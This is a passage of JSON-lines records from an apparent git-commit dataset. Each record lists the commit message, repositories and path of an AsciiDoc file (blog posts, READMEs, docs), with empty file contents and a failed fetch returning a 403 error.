to '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64481bee03f79f61ecbc3e72615896d661690af2","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1a25eb85087931f30053260f008adea560a129e","subject":"Update 2016-08-28-Not-mine-to-love.adoc","message":"Update 2016-08-28-Not-mine-to-love.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-08-28-Not-mine-to-love.adoc","new_file":"_posts\/2016-08-28-Not-mine-to-love.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35f93e0a3509c7b3fceb2b883a20ac78fad46d37","subject":"Update 2017-02-24-Chrome-Extension.adoc","message":"Update 2017-02-24-Chrome-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ade82bd0b04a3282a538d99b3deaaf790e5bc42d","subject":"Document the change from #921 in the manual.","message":"Document the change from #921 in the manual.\n","repos":"automeka\/ninja,jimon\/ninja,autopulated\/ninja,automeka\/ninja,dorgonman\/ninja,mohamed\/ninja,Qix-\/ninja,Ju2ender\/ninja,moroten\/ninja,hnney\/ninja,hnney\/ninja,vvvrrooomm\/ninja,colincross\/ninja,hnney\/ninja,juntalis\/ninja,nafest\/ninja,atetubou\/ninja,ThiagoGarciaAlves\/ninja,martine\/ninja,atetubou\/ninja,colincross\/ninja,maruel\/ninja,ndsol\/subninja,mydongistiny\/ninja,mydongistiny\/ninja,mgaunard\/ninja,moroten\/ninja,Ju2ender\/ninja,ThiagoGarciaAlves\/ninja,juntalis\/ninja,Maratyszcza\/ninja-pypi,ninja-build\/ninja,ilor\/ninja,mohamed\/ninja,AoD314\/ninja,atetubou\/ninja,AoD314\/ninja,mydongistiny\/ninja,fuchsia-mirror\/third_party-ninja,bradking\/ninja,liukd\/ninja,ignatenkobrain\/ninja,nicolasdespres\/ninja,jimon\/ninja,lizh06\/ninja,sxlin\/dist_ninja,dorgonman\/ninja,ilor\/ninja,bmeurer\/ninja,Qix-\/ninja,sxlin\/dist_ninja,colincross\/ninja,iwadon\/ninja,Ju2ender\/ninja,ilor\/ninja,tfarina\/ninja,nico\/ninja,dorgonman\/ninja,bradking\/ninja,moroten\/ninja,automeka\/ninja,maruel\/ninja,iwadon\/ninja,martine\/ninja,autopulated\/ninja,autopulated\/ninja,vvvrrooomm\/ninja,kissthink\/ninja,autopulated\/ninja,sgraham\/ninja,mydongistiny\/ninja,atetubou\/ninja,ninja-build\/ninja,moroten\/ninja,AoD314\/ninja,mgaunard\/ninja,synaptek\/ninja,iwadon\/ninja,ndsol\/subninja,sgraham\/ninja,nicolasdespres\/ninja,Qix-\/ninja,ndsol\/subninja,nico\/ninja,Maratyszcza\/ninja-pypi,tfarina\/ninja,kissthink\/ninja,sxlin\/dist_ninja,maruel\/ninja,tfarina\/ninja,Qix-\/ninja,vvvrrooomm\/ninja,bmeurer\/ninja,synaptek\/ninja,mgaunard\/ninja,maruel\/ninja,jimon\/ninja,nicolasdespres\/ninja,synaptek\/ninja,dorgonman\/ninja,nicolasdespres\/ninja,juntalis\/ninja,ninja-build\/ninja,martine\/ninja,ignatenkobrain\/ninja,bradking\/ninja,sxlin\/dist_ninja,hnney\/ninja,automeka\/ninja,bmeurer\/ninja,lizh06\/ninja,sxlin\/dist_ninja,tfarina\/ninja,mohamed\/ninja,mgaunard\/ninja,ignatenkobrain\/ninja,fuchsia-mirror\/third_party-ninja,ThiagoGarciaAlves\/ninja,kissthink\/ninja,kissthink\/ninja,bmeurer\/ninja,lizh06\/ninja,vvvrrooomm\/ninja,nico\/ninja,ninja-build\/ninja,sgraham\/ninja,mohamed\/ninja,lizh06\/ninja,iwadon\/ninja,nafest\/ninja,ignatenkobrain\/ninja,martine\/ninja,nafest\/ninja,nafest\/ninja,fuchsia-mirror\/third_party-ninja,sxlin\/dist_ninja,ilor\/ninja,liukd\/ninja,liukd\/ninja,ThiagoGarciaAlves\/ninja,sgraham\/ninja,fuchsia-mirror\/third_party-ninja,nico\/ninja,juntalis\/ninja,AoD314\/ninja,sxlin\/dist_ninja,Ju2ender\/ninja,jimon\/ninja,ndsol\/subninja,bradking\/ninja,Maratyszcza\/ninja-pypi,Maratyszcza\/ninja-pypi,colincross\/ninja,liukd\/ninja,synaptek\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new
_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b63db85894912d358c3596b047812210b6ec7969","subject":"Ricodificato il ritorno a capo: dos2unix","message":"Ricodificato il ritorno a capo: dos2unix\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d1f0014516bc1ba6341989fb6f33f3f605e1d7fe","subject":"Update 2017-01-02-Happy-New-Year.adoc","message":"Update 2017-01-02-Happy-New-Year.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-02-Happy-New-Year.adoc","new_file":"_posts\/2017-01-02-Happy-New-Year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b8a4509cb1f388784e43c91b60e567703f12613","subject":"job #12519 add implementation note","message":"job #12519 add implementation note\n","repos":"xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12519_import_from_int.int.adoc","new_file":"doc-bridgepoint\/notes\/12519_import_from_int.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dcfe77ecdec52b79dfb4a93b7b7707f4acadf80b","subject":"Added README document.","message":"Added README document.\n","repos":"nevenc-pivotal\/pcf-environment-performance-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nevenc-pivotal\/pcf-environment-performance-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6bf83e34b54ed83c4ce8b179ee624b1096c27c","subject":"fix(doc): update json sample","message":"fix(doc): update json 
sample\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a766ce6e4c919e546fdeab7598d4fbb61e2e6902","subject":"Close #22 by fixing typo.","message":"Close #22 by fixing typo.\n","repos":"supriyantomaftuh\/python_api,supriyantomaftuh\/python_api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/supriyantomaftuh\/python_api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"469bb90033a275d728f7577437c0cb240997c5e2","subject":"Added readme.","message":"Added readme.\n","repos":"chordlove\/chordlove,chordlove\/chordlove,chordlove\/chordlove","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chordlove\/chordlove.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d52973ce1892d24eff2008bc3bf3875ecc947eb6","subject":"Initial commit","message":"Initial commit\n","repos":"jirutka\/asciidoctor-html5,jirutka\/asciidoctor-html5","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/asciidoctor-html5.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"843fd8bc3843f41f3b7bac40e6d0fbc3aae33a84","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb573e1f300926b5fc9ffc8b3450c2b064f87330","subject":"Update 2018-09-06-Test-for-ganjalf.adoc","message":"Update 2018-09-06-Test-for-ganjalf.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-09-06-Test-for-ganjalf.adoc","new_file":"_posts\/2018-09-06-Test-for-ganjalf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6fb5e784f00f260ae619d086bb2ec6488f6d007","subject":"Update 2017-01-14-Life-Death-Life.adoc","message":"Update 2017-01-14-Life-Death-Life.adoc","repos":"seatones\/seatones.github.io,seatones\/seatones.github.io,seatones\/seatones.github.io,seatones\/seatones.github.io","old_file":"_posts\/2017-01-14-Life-Death-Life.adoc","new_file":"_posts\/2017-01-14-Life-Death-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seatones\/seatones.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db8078b906da519c1a835db5814a8081da246b48","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31d0fbeba3b0187722194289b8bdadca59df8b54","subject":"Update 2019-01-31-language-basics.adoc","message":"Update 2019-01-31-language-basics.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-language-basics.adoc","new_file":"_posts\/2019-01-31-language-basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a603835350f39c798382422842574b8da44af49a","subject":"Update 2016-11-10-On-choosing-careers.adoc","message":"Update 2016-11-10-On-choosing-careers.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-11-10-On-choosing-careers.adoc","new_file":"_posts\/2016-11-10-On-choosing-careers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76270eaf65b333a65db3faa321a44e09e67059b1","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c856ddfc3e9b14ea9be52d5c3ed709e32bd1a780","subject":"Fix travis build failure due to missing modules folder","message":"Fix travis build failure due to missing modules 
folder\n","repos":"hawkular\/hawkular-apm,objectiser\/hawkular-btm,objectiser\/hawkular-btm,objectiser\/hawkular-btm,objectiser\/hawkular-apm,objectiser\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,objectiser\/hawkular-apm,jpkrohling\/hawkular-btm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,hawkular\/hawkular-btm,jpkrohling\/hawkular-btm,jpkrohling\/hawkular-apm,objectiser\/hawkular-btm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-apm,hawkular\/hawkular-apm","old_file":"feature-pack\/src\/main\/resources\/modules\/README.adoc","new_file":"feature-pack\/src\/main\/resources\/modules\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpkrohling\/hawkular-apm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"058828ac11971800c3c2c3c7cf8d374002a6a0ce","subject":"Create CODE_OF_CONDUCT.adoc","message":"Create CODE_OF_CONDUCT.adoc","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74801ef6f0e8d227a0058754bc5cf403576945cc","subject":"add blog article","message":"add blog article\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"learn\/testimonialsAndCaseStudies.adoc","new_file":"learn\/testimonialsAndCaseStudies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"764917b7982520e01327fcf858ccceb1fd96b148","subject":"fix(glossary): chore ES6 Promises","message":"fix(glossary): chore ES6 
Promises\n","repos":"lidasong2014\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,liubin\/promises-book,liyunsheng\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,mzbac\/promises-book,azu\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,liubin\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,azu\/promises-book,mzbac\/promises-book,sunfurong\/promise,purepennons\/promises-book,genie88\/promises-book,oToUC\/promises-book,oToUC\/promises-book,genie88\/promises-book,dieface\/promises-book,dieface\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,sunfurong\/promise,purepennons\/promises-book,mzbac\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,azu\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,wenber\/promises-book,oToUC\/promises-book","old_file":"Glossary\/readme.adoc","new_file":"Glossary\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced38e37edaf194a7e6f17a17d11b65b30c074f9","subject":"y2b create post Massive 4X iPad Mini Giveaway!","message":"y2b create post Massive 4X iPad Mini Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-08-Massive-4X-iPad-Mini-Giveaway.adoc","new_file":"_posts\/2013-03-08-Massive-4X-iPad-Mini-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a294bf59edffbd3c68a93652386f894ef9664eb2","subject":"Update 2017-06-25-Dealing-with-team-rejection.adoc","message":"Update 2017-06-25-Dealing-with-team-rejection.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe0be9dc507ed37326c2a33760a2b898acc095e0","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository-mongodb,gravitee-io\/gravitee-repository-mongodb","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7325df674a8ae01077e4a545f4a2a1cd32ffc56d","subject":"Update 2015-02-24-need-h1-to-save.adoc","message":"Update 
2015-02-24-need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0221d5c42c329c22c96f48dc79e94e8d73b468e","subject":"Update 2017-01-06-ppap-javascript.adoc","message":"Update 2017-01-06-ppap-javascript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0349ef934cfff744cd7bc7a4311812e01fea004","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60dbe907e8087973c39181034214ec64e93cd0cb","subject":"Update 2015-09-12-Eka-postaus.adoc","message":"Update 2015-09-12-Eka-postaus.adoc","repos":"mikaman\/mikaman.github.io,mikaman\/mikaman.github.io,mikaman\/mikaman.github.io","old_file":"_posts\/2015-09-12-Eka-postaus.adoc","new_file":"_posts\/2015-09-12-Eka-postaus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikaman\/mikaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b00be2e513f12ded14d4432278df7a2dacb217d","subject":"Update 2015-09-25-Second-post.adoc","message":"Update 2015-09-25-Second-post.adoc","repos":"spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress","old_file":"_posts\/2015-09-25-Second-post.adoc","new_file":"_posts\/2015-09-25-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spe\/spe.github.io.hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af2bf0e2d042ba4746686c60eaa5402823b19025","subject":"Update 2016-05-02-Lonely-road.adoc","message":"Update 2016-05-02-Lonely-road.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-02-Lonely-road.adoc","new_file":"_posts\/2016-05-02-Lonely-road.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f2ecb7096d5c85816c467b57eb8fa6e8fb7a805","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 
2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f02b0783fbec98f47a9b0aa9a1367cfa080868a0","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c378ca461072fe757c3035a80f0dd2757dac0ee2","subject":"Add in ClojureBridge Event Page","message":"Add in ClojureBridge Event Page\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojurebridge.adoc","new_file":"content\/events\/2020\/clojurebridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"185181f659bf6cc6cf33e7876ca6e45d62070d82","subject":"Marked source Java","message":"Marked source Java\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Syntax\/Interfaces.adoc","new_file":"Syntax\/Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab9778575fd564bcb00f90e50a3f7976a94af22b","subject":"y2b create post Is This The Steam Box? (Xi3 X5A Unboxing \\u0026 Overview)","message":"y2b create post Is This The Steam Box? 
(Xi3 X5A Unboxing \\u0026 Overview)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-01-Is-This-The-Steam-Box-Xi3-X5A-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-02-01-Is-This-The-Steam-Box-Xi3-X5A-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77c3ebe4dfc29201534c592da570ee58e049d3b2","subject":"Fixed readme roadmap links","message":"Fixed readme roadmap links","repos":"bjartek\/oc-cluster-wrapper,openshift-evangelists\/oc-cluster-wrapper","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/oc-cluster-wrapper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af250857e80c375adf0357f86509c17da6fcc708","subject":"added README","message":"added README\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b09648005536e62f77c9d738ffe7dab576df0c8","subject":"Added initial README file","message":"Added initial README file\n","repos":"GoodGrind\/ghostwriter-api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoodGrind\/ghostwriter-api.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"381e85e8ce7ad5940c045d2c28d28ef006c35d1d","subject":"Initial revision for catalog plugin doc","message":"Initial revision for catalog plugin 